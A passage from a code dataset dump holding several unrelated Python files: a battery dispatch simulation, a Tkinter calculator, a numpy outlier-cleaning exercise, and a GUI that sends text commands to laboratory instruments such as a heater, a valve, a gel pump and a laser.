forward_data.rename(columns={'RESIDUALDEMAND': '{}-demand'.format(r)})\n forward_data = forward_data.drop(columns=['SETTLEMENTDATE'])\n\n for battery_capacity_mw in range(0, 3300, 300):\n for storage_hours in [0.5, 1, 2, 3, 4, 8]:\n\n p = planner.DispatchPlanner(dispatch_interval=5, historical_data=regional_data,\n forward_data=forward_data, demand_delta_steps=1000, train_pct=0.005)\n\n battery = units.GenericUnit(p, initial_dispatch=0.0, optimisation_time_step=5)\n battery.set_service_region('energy', r)\n battery.add_from_market_energy_flow(battery_capacity_mw)\n battery.add_to_market_energy_flow(battery_capacity_mw)\n battery.add_storage(mwh=battery_capacity_mw * storage_hours,\n initial_mwh=battery_capacity_mw * storage_hours * 0.5,\n output_capacity=battery_capacity_mw, input_capacity=battery_capacity_mw,\n input_efficiency=0.9, output_efficiency=0.9)\n\n p.add_demand_smoothing_objective_function(r, 'energy')\n\n p.optimise()\n\n dispatch = battery.get_dispatch()\n\n dispatch = pd.merge(dispatch, settlement_dates, on='interval')\n dispatch.to_csv('battery_dispatch_profiles_v2/{}_{}_{}_month.csv'.format(r, battery_capacity_mw, storage_hours),\n index=False)\n","sub_path":"examples/battery_residual_demand_minimiser.py","file_name":"battery_residual_demand_minimiser.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500063680","text":"from tkinter import *\r\nimport math\r\n\r\nroot = Tk()\r\nroot.title(\"Simple Calculator\")\r\n\r\ne = Entry(root, width=35, borderwidth=5)\r\ne.grid(row=0, column=0, columnspan=3, padx=10, pady=10)\r\n\r\n\t# Button Functions\r\n\r\ndef button_click(number):\r\n\tcurrent = e.get()\r\n\te.delete(0, END)\r\n\te.insert(0, str(current) + str(number))\r\n\r\ndef button_clear():\r\n\te.delete(0, END)\r\n\r\ndef button_equal():\r\n\tsecond_number = e.get()\r\n\te.delete(0, END)\r\n\r\n\tif math == \"addition\":\r\n\t\te.insert(0, f_num + float(second_number))\r\n\r\n\tif math == \"subtraction\":\r\n\t\te.insert(0, f_num - float(second_number))\r\n\r\n\tif math == \"multiplication\":\r\n\t\te.insert(0, f_num * float(second_number))\r\n\r\n\tif math == \"division\":\r\n\t\te.insert(0, f_num / float(second_number))\r\n\r\n\tif math == \"square\":\r\n\t\te.insert(0, f_num ** 2)\r\n\r\n\tif math == \"sqrt\":\r\n\t\te.insert(0, f_num ** 0.5)\r\n\r\n\tif math == \"plusminus\":\r\n\t\te.insert(0, f_num * -1)\r\n\r\n\tif math == \"percent\":\r\n\t\te.insert(0, 1/f_num)\r\n\r\ndef button_add():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"addition\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_subtract():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"subtraction\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_multiply():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"multiplication\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_divide():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"division\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_square():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"square\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\n\r\ndef button_percent():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"percent\"\r\n\tf_num = 
float(first_number)\r\n\te.delete(0, END)\r\n\t#e.insert(0, f_num / 100)\r\n\r\ndef button_sqrt():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"sqrt\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\ndef button_plusminus():\r\n\tfirst_number = e.get()\r\n\tglobal f_num\r\n\tglobal math\r\n\tmath = \"plusminus\"\r\n\tf_num = float(first_number)\r\n\te.delete(0, END)\r\n\r\n\r\n\r\n# Define buttons\r\n\r\nbutton_1 = Button(root, text=\"1\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(1))\r\nbutton_2 = Button(root, text=\"2\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(2))\r\nbutton_3 = Button(root, text=\"3\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(3))\r\nbutton_4 = Button(root, text=\"4\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(4))\r\nbutton_5 = Button(root, text=\"5\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(5))\r\nbutton_6 = Button(root, text=\"6\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(6))\r\nbutton_7 = Button(root, text=\"7\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(7))\r\nbutton_8 = Button(root, text=\"8\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(8))\r\nbutton_9 = Button(root, text=\"9\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(9))\r\nbutton_0 = Button(root, text=\"0\", padx=40, pady=20, bg=\"pale green\", command=lambda: button_click(0))\r\nbutton_percent = Button(root, text=\"%\", padx=38, pady=20, bg=\"red\", command=button_percent)\r\nbutton_clear = Button(root, text=\"Clear\", padx=29, pady=20, bg=\"red\", command=button_clear)\r\nbutton_add = Button(root, text=\"+\", padx=40, pady=20, bg=\"sky blue\", command=button_add)\r\nbutton_divide = Button(root, text=\"/\", padx=40, pady=20, bg= \"sky blue\", command=button_divide)\r\nbutton_square = Button(root, text=\"x^2 \", padx=31, pady=20, bg=\"red\", command=button_square)\r\nbutton_subtract = Button(root, text=\"-\", padx=41, pady=20, bg=\"sky blue\", command=button_subtract)\r\nbutton_multiply = Button(root, text=\"*\", padx=40.5, pady=20, bg=\"sky blue\", command=button_multiply)\r\nbutton_plusminus = Button(root, text=\"+/-\", padx=33, pady=20, bg=\"red\", command=button_plusminus)\r\nbutton_sqrt = Button(root, text=\"sqrt \", padx=32, pady=20, bg=\"red\", command=button_sqrt)\r\nbutton_equal = Button(root, text=\"=\", padx=86, pady=20, bg=\"yellow\", command=button_equal)\r\n\r\n# Put buttons on screen\r\n\r\nbutton_1.grid(row=3, column=0)\r\nbutton_2.grid(row=3, column=1)\r\nbutton_3.grid(row=3, column=2)\r\n\r\nbutton_4.grid(row=2, column=0)\r\nbutton_5.grid(row=2, column=1)\r\nbutton_6.grid(row=2, column=2)\r\n\r\nbutton_7.grid(row=1, column=0)\r\nbutton_8.grid(row=1, column=1)\r\nbutton_9.grid(row=1, column=2)\r\n\r\nbutton_0.grid(row=4, column=0)\r\nbutton_percent.grid(row=4,column=1)\r\nbutton_clear.grid(row=4, column=2)\r\n\r\n\r\nbutton_add.grid(row=5, column=0)\r\nbutton_square.grid(row=5, column=2)\r\nbutton_divide.grid(row=5, column=1)\r\n\r\n\r\n\r\nbutton_subtract.grid(row=6, column=0)\r\nbutton_multiply.grid(row=6, column=1)\r\nbutton_plusminus.grid(row=6, column=2)\r\n\r\nbutton_sqrt.grid(row=7, column=0)\r\nbutton_equal.grid(row=7, columnspan = 2, column=1) #columnspan() to make 
wider\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"525828243","text":"import numpy as np  # Import numpy.\n\n# Create a pseudo dataset using a numpy array.\nx = np.array([100, 94,88,120, 130,80, 'fakevalue', '', 65, 150, 200, 'blah', 65,999])\n\n# Show raw dataset.\nprint('RAW DATASET:')\nprint(x)\n\n# Flag the entries that are purely numeric strings (digits only).\nis_number = [element.isdigit() for element in x]\n\n# Copy into new array that doesn't have the pesky strings.\nx_nums = x[is_number]\n\n# Convert the number 'strings' array into an array of actual numbers.\n# (The builtin int is used here; the old np.int alias has been removed from NumPy.)\nx_nums = x_nums.astype(int)\n\n# Show numbers only.\nprint(' -> Numbers only: {0}'.format(x_nums))\n\n# Get upper limit by adding the mean + 2 standard deviations.\nupperlimit = np.mean(x_nums) + 2*np.std(x_nums)\n\n# Get the lower limit by subtracting two standard deviations from the mean.\nlowerlimit = np.mean(x_nums) - 2*np.std(x_nums)\n\n# Flag numbers that are non-outliers as valid.\nvalid = (x_nums < upperlimit) & (x_nums > lowerlimit)\n\n# Flag outliers as invalid.\ninvalid = (x_nums < lowerlimit) | (x_nums > upperlimit)\n\n# Make a copy of the dataset with only the numeric, valid (not outliers) results.\nclipped_dataset = x_nums[valid]\n\n# Show dataset with values removed.\nprint(' -> Outliers Removed: {0}'.format(clipped_dataset))\n\n# Invalid is the complement of valid.\ninvalid = ~valid\n\n# Calculate adjusted mean, with outliers removed.\nmean = np.mean(clipped_dataset)\nprint(' -> The adj. mean is {0}.'.format(mean))\n\n# Calculate the number of dummy values to insert to compensate for the invalid values.\ndummyct = len(x) - len(clipped_dataset)\n\nprint(' -> Replacing {0} invalid entries with {1}.'.format(dummyct,mean))\n\n# Create a numpy array with a dummy value for each string that was removed at the beginning.\ndummies = np.repeat(mean, dummyct)\n\n# Combine the clipped dataset with the numpy array of dummies.\ncleaned_dataset = np.concatenate((clipped_dataset, dummies), axis=0)\n\nprint('')\n\nprint('CLEANED DATASET:')\n\nprint(cleaned_dataset)\n\n# SUMMARY: The dataset has been cleaned by removing the non-numeric strings, converting the array to integers,\n# and then identifying the Gaussian outliers and removing them too. The script then compares the length of the 'clipped'\n# array and the length of the original array to calculate the number of dummy values to insert. 
The script then inserts\n# the mean as the dummy value until all of the missing values in the array have been replaced.","sub_path":"class1/Berkowitz-L04-DataCleaning.py","file_name":"Berkowitz-L04-DataCleaning.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"156962360","text":"from __future__ import print_function\nimport logging\nimport subprocess\nimport time\nfrom Tkinter import *\nfrom serial import *\nfrom threading import Thread, RLock\n\nfrom tendo import singleton\n\nFORMAT = '%(levelname)s:%(funcName)s:%(message)s'\nformat1 = '(%(threadName)-10s) %(message)s'\nlogging.basicConfig(format=format1, level=logging.DEBUG)\n\n# This line of code will only make it so that only one instance of the gui is running.\n# from tendo import singleton\nme = singleton.SingleInstance()\n\n\nclass KevinsThreadWithArgs(Thread):\n def __init__(self, group=None, target=None, name=None,\n args=(), kwargs=None, verbose=None):\n Thread.__init__(self, group=group, target=target, name=name,\n verbose=verbose)\n self.args = args\n self.kwargs = kwargs\n return\n\n def run(self):\n logging.debug('running with %s and %s', self.args, self.kwargs)\n return\n\n\n\ndef on_send_button_click():\n \"\"\"\n INVTHW\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = ''\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"INVTHW\", \"args\": args}\n proc.stdin.write(cmd)\n cnum += 1\n\n\ndef shutdown_button_click():\n \"\"\"\n Button click to stop/abort the thermo cycler's currently running sequence\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = ''\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"SHUTDOWN\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n luna.quit()\n cnum += 1\n\ndef the_reader_thread():\n \"\"\"\n\n Need this reader thread to flush out proc.stdout\n :return:\n \"\"\"\n while (True):\n out = proc.stdout.readline()\n id = out[:10].strip()\n length = out[10:20].strip()\n device_name = out[20:84].strip()\n cmd = out[84:94].strip()\n args = out[94:]\n if cmd == \"INVTHW\":\n logging.info(\"Inside back_and_forth: %s\", out)\n if device_name == \"FluidValve\":\n return\n\ndef cont_run_Thread(min):\n \"\"\"\n\n :return:\n \"\"\"\n t_end = time.time() + (60 * min)\n while time.time() < t_end:\n time.sleep(1)\n getvi_THREAD1 = Thread(target=GETVI_Thread)\n getvi_THREAD1.start()\n time.sleep(1)\n capgett_thread1 = Thread(target=CAPGETT_Thread)\n capgett_thread1.start()\n capgett_thread1.join()\n\n\n\n\n##### SEQUENCSE OF AUTOMATION #######\ndef pt1_run_state_sequence():\n \"\"\"\n Have the heater on...\n\n automation function\n for LUNA prototype 1\n :return:\n \"\"\"\n \"\"\"\n Initilaize Gel\n \"\"\"\n # Start at buffer to initialize gel\n # down_thread1 = Thread(target=STAGEZDN_Thread)\n # down_thread1.start() # Probably dont need this thread since the buffer thread will check to see if it's at the buffer or not\n # buffer_thread1 = Thread(target=SXBUFFER_Thread)\n # buffer_thread1.start()\n # up_thread1 = Thread(target=STAGEZUP_Thread)\n # up_thread1.start()\n\n # Turn on the High Voltage 10kV\n # setv_thread1 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"10\"})\n # setv_thread1.start()\n # # Loops for 3 minutes\n # min = 3\n # t_end = 
time.time() + (60 * min)\n # while time.time() < t_end:\n # time.sleep(1)\n # getvi_THREAD1 = Thread(target=GETVI_Thread)\n # getvi_THREAD1.start()\n # # Turn off HV\n # setv_thread_off = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"0\"})\n # setv_thread_off.start()\n # getvi_thread_off = Thread(target=GETVI_Thread)\n # getvi_thread_off.start()\n\n # Transition to water\n # transition_down_thread1 = Thread(target=STAGEZDN_Thread)\n # transition_down_thread1.start()\n # transition_water_thread1 = Thread(target=SXWATER_Thread)\n # transition_water_thread1.start()\n # transition_up_thread1 = Thread(target=STAGEZUP_Thread)\n # transition_up_thread1.start()\n\n \"\"\"\n Injection\n \"\"\"\n # down_thread1 = Thread(target=STAGEZDN_Thread)\n # down_thread1.start()\n # sample_thread = Thread(target=SXSAMPLE_Thread)\n # sample_thread.start()\n # up_thread1 = Thread(target=STAGEZUP_Thread)\n # up_thread1.start()\n #\n # # Turn on the High Voltage 5kV\n # setv_thread2 = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"5\"})\n # setv_thread2.start()\n # # Loops for 10 seconds\n # sec = 10\n # t_end = time.time() + sec\n # while time.time() < t_end:\n # time.sleep(1)\n # getvi_THREAD1 = Thread(target=GETVI_Thread)\n # getvi_THREAD1.start()\n # # Turn off HV\n # setv_thread_off = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"0\"})\n # setv_thread_off.start()\n # getvi_thread_off = Thread(target=GETVI_Thread)\n # getvi_thread_off.start()\n #\n # # Transition to water\n # transition_down_thread2 = Thread(target=STAGEZDN_Thread)\n # transition_down_thread2.start()\n # transition_water_thread2 = Thread(target=SXWATER_Thread)\n # transition_water_thread2.start()\n # transition_up_thread2 = Thread(target=STAGEZUP_Thread)\n # transition_up_thread2.start()\n #\n #\n # \"\"\"\n # Run\n # \"\"\"\n # down_thread4 = Thread(target=STAGEZDN_Thread)\n # down_thread4.start() # Probably dont need this thread since the buffer thread will check to see if it's at the buffer or not\n # buffer_thread4 = Thread(target=SXBUFFER_Thread)\n # buffer_thread4.start()\n # up_thread4 = Thread(target=STAGEZUP_Thread)\n # up_thread4.start()\n #\n # # Turn on HV\n # setv_thread_on = Thread(target=SETV_Thread, kwargs={\"set_vol\": \"10\"})\n # setv_thread_on.start()\n # getvi_thread_on = Thread(target=GETVI_Thread)\n # getvi_thread_on.start()\n #\n # # Set and turn on Laser\n setlstate_thread_on = Thread(target=SETLSTATE_Thread, kwargs={\"state\": \"ON\"})\n setlstate_thread_on.start()\n time.sleep(3)\n getlspower_thread1 = Thread(target=GETLPWR_Thread)\n getlspower_thread1.start()\n time.sleep(3)\n setlpower_thread = Thread(target=SETLPOWER_Thread, kwargs={\"watts\": 10})\n setlpower_thread.start()\n time.sleep(3)\n getlspower_thread2 = Thread(target=GETLPWR_Thread)\n getlspower_thread2.start()\n time.sleep(3)\n setlstate_thread_off = Thread(target=SETLSTATE_Thread, kwargs={\"state\": \"OFF\"})\n setlstate_thread_off.start()\n #\n # # Turn on spectrometer, do this after I test out all the rest.\n #\n # # Start a reader thread\n # running_for_however_long_thread = Thread(target=cont_run_Thread, kwargs={\"min\": 45})\n # running_for_however_long_thread.start()\n\ndef back_and_forth():\n\n # global automation_lock\n\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n right_thread1 = Thread(target=SXRGHTBIG_Thread)\n right_thread1.start()\n\n left_thread1 = Thread(target=SXLFTBIG_Thread)\n left_thread1.start()\n\n right_thread2 = Thread(target=SXRGHTBIG_Thread)\n right_thread2.start()\n\n left_thread2 = 
Thread(target=SXLFTBIG_Thread)\n left_thread2.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n right_thread1.join()\n left_thread1.join()\n right_thread2.join()\n left_thread2.join()\n up_thread1.join()\n logging.info(\"Finished start_thread_button_click\")\n\ndef go_to_sample():\n \"\"\"\n\n :return:\n \"\"\"\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXSAMPLE_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to sample\")\n\ndef go_to_buffer():\n \"\"\"\n 1) STAGEZDN\n 2) SXBUFFER\n 3) STAGEZUP\n :return:\n \"\"\"\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXBUFFER_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to buffer\")\n\ndef go_to_water():\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXWATER_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to water\")\n\ndef go_to_waste():\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n command_thread = Thread(target=SXWASTE_Thread)\n command_thread.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n command_thread.join()\n up_thread1.join()\n logging.info(\"Finished going to waste\")\n\ndef up_and_down():\n\n\n down_thread1 = Thread(target=STAGEZDN_Thread)\n down_thread1.start()\n\n up_thread2 = Thread(target=STAGEZUP_Thread)\n up_thread2.start()\n\n down_thread2 = Thread(target=STAGEZDN_Thread)\n down_thread2.start()\n\n up_thread1 = Thread(target=STAGEZUP_Thread)\n up_thread1.start()\n\n down_thread1.join()\n up_thread2.join()\n up_thread1.join()\n down_thread2.join()\n logging.info(\"Up and down function\")\n\n################################ Dave's Machines ########################\n\"\"\"\nCapillary Heater\n\"\"\"\ndef CAPHEATON_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPHEATON\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n # TODO Need a feedback from the pi\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef CAPHEATOFF_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPHEATOFF\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n # TODO Need a feedback from the pi\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef gett_cap_heater_button_click():\n #TODO To make this into a thread and have it in pimain.py\n 
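# Note: unlike CAPGETT_Thread below, this click handler fires the CAPGETT\n    # command without taking the automation lock or reading the reply; the\n    # response is presumably drained by the_reader_thread.\n    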
\"\"\"\n\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPGETT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\ndef CAPGETT_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPGETT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef sett_cap_heater_button_click(entry):\n \"\"\"\n Button click to set the capillary heater temperature [degrees C]\n :param entry: Tkinter entry\n :return:\n \"\"\"\n input = entry.get()\n global proc\n global cnum\n size = 94 + len(input)\n name = 'Pi'\n args = input\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPSETT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\n\n\"\"\"\nLaser Motor\n\"\"\"\ndef LASLEFT_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"LASLEFT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef LASRIGHT_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"LASRIGHT\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef LMHOME_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"LMHOME\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\ndef CAPREADY_Thread():\n \"\"\"\n\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"CAPREADY\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\n\"\"\" Fluidic Valve Commands \"\"\"\ndef FVALVEPOS_Thread(valve_pos = \"CLOSED\"):\n \"\"\"\n Thread function that set's the Fluidic Valve to whatever position is passed as the\n parameter\n 
:param valve_pos: string \"A\"|\"B\"|\"CLOSED\"\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n name = 'FluidValve'\n size = 94 + len(valve_pos)\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"FVALVEPOS\", \"args\": valve_pos}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n finally:\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n automation_lock.release()\n\ndef set_fluidic_valve_clicked():\n input = valve_set.get()\n global proc\n global cnum\n name = 'FluidValve'\n if input==1:\n args = 'A'\n elif input==2:\n args = 'B'\n elif input==3:\n args = 'CLOSED'\n size = 94 + len(args)\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"FVALVEPOS\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n\n\"\"\"\nGel Pump\n\"\"\"\ndef GPHOME_Thread():\n \"\"\"\n GPHOME\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPHOME\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n automation_lock.release()\n\n\ndef GPSTART_Thread():\n \"\"\"\n GPSTART\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPSTART\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n finally:\n # logging.info(\"releasing lock from\")\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n automation_lock.release()\n\ndef gp_up_button_click():\n \"\"\"\n GPUP\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPUP\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\ndef gp_down_button_click():\n \"\"\"\n GPDOWN\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'Pi'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPDOWN\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n\n# def gp_rate_button_click(entry):\n# \"\"\"\n# GPRATE_10 [microL/sec]\n# :return:\n# \"\"\"\n# #TODO still need to fix this\n# input = entry.get()\n# global proc\n# global cnum\n# size = 94 + len(input)\n# name = 'Pi'\n# args = input\n# cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n# {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GPRATE\", \"args\": args}\n# proc.stdin.write(cmd)\n# cnum += 1\n\n################################ Dave's Machines ########################\ndef kill_pi_clicked():\n \"\"\"\n\n :return:\n \"\"\"\n global proc\n global cnum\n size = 94\n name = 'pi'\n args = ''\n cmd = 
'%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"KILL\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum+=1\n\n\"\"\"\nOBIS Laser\n\"\"\"\n\ndef GETLPWR_Thread():\n \"\"\"\n Get Laser Power\n CMD: \t\t\tGETLPWR\n Device Name: \tOBISLaser\n Response: \t\tOK________[power in watts]\\n\n Example: \t\tGETLPWR___\\n\n Description: \t\tWill return the current output power (in watts).\n\n Still need to test\n :return:\n \"\"\"\n global proc, cnum, automation_lock\n automation_lock.acquire()\n try:\n size = 94\n name = 'OBISLaser'\n args = ''\n cmd = '%(cnum)010d%(size)010d%(deviceName)-64s%(cmd)-10s%(args)s\\n' % \\\n {\"cnum\": cnum, \"size\": size, \"deviceName\": name, \"cmd\": \"GETLPWR\", \"args\": args}\n proc.stdin.write(cmd)\n proc.stdin.flush()\n cnum += 1\n out = proc.stdout.readline()\n logging.debug(\"out = \" + out)\n finally:\n 